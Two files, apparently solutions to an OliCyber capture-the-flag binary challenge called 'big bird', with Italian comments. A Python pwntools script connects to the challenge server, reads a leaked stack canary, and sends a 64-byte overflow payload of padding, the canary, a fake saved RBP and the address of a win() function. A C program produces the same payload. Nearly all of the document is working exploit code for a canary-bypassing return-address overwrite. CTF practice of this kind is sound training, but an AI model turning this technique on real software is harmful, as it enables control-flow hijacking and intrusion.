File: Binary/big bird/big bird.py
import struct
from pwn import *

def main():
    conn = remote('bigbird.challs.olicyber.it', 12006)
    conn.recvuntil("Here, take some data about this BIG BIRD: ")

    # Ricevi il canary e convertilo in formato integer (assumiamo che sia in formato esadecimale)
    canary = int(conn.recvline().strip(), 16)
    print(f'canary: {hex(canary)}')
    
    conn.recvline()

    win_addr = 0x401715

    # Creazione del buffer di payload
    payload = bytearray(64)
    
    # Riempie il buffer fino al canary (40 byte di 'A')
    payload[:40] = b'A' * 40
    
    # Inserisce il valore del canary (8 byte)
    payload[40:48] = struct.pack('<Q', canary)
    
    # Riempie RBP fittizio (8 byte di 'B')
    payload[48:56] = b'B' * 8
    
    # Inserisce l'indirizzo della funzione win() (8 byte)
    payload[56:64] = struct.pack('<Q', win_addr)
    
    # Stampa il payload (opzionale: per debug)
    print(f"Payload: {payload.hex()}")
    
    # Invia il payload
    conn.sendline(payload)

    # Ricevi la risposta
    response = conn.recvall()
    print(response.decode())

if __name__ == "__main__":
    main()

File: Olicyber/Binary/big bird/big bird.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main() {

    char payload[64];
    unsigned long canary;  
    unsigned long win_addr = 0x401715;  // Indirizzo della funzione win()
    
    printf("Inserisci il valore del canary (esadecimale): ");
    scanf("%lx", &canary);  

    // Riempie il buffer fino al canary
    memset(payload, 'A', 40);

    // Inserisce il valore del canary
    memcpy(payload + 40, &canary, 8);

    // riempio RBP  
    memset(payload + 48, 'B', 8);

    // Indirizzo della funzione win()
    memcpy(payload + 56, &win_addr, 8);

    fwrite(payload, 1, sizeof(payload), stdout);
    return 0;
}
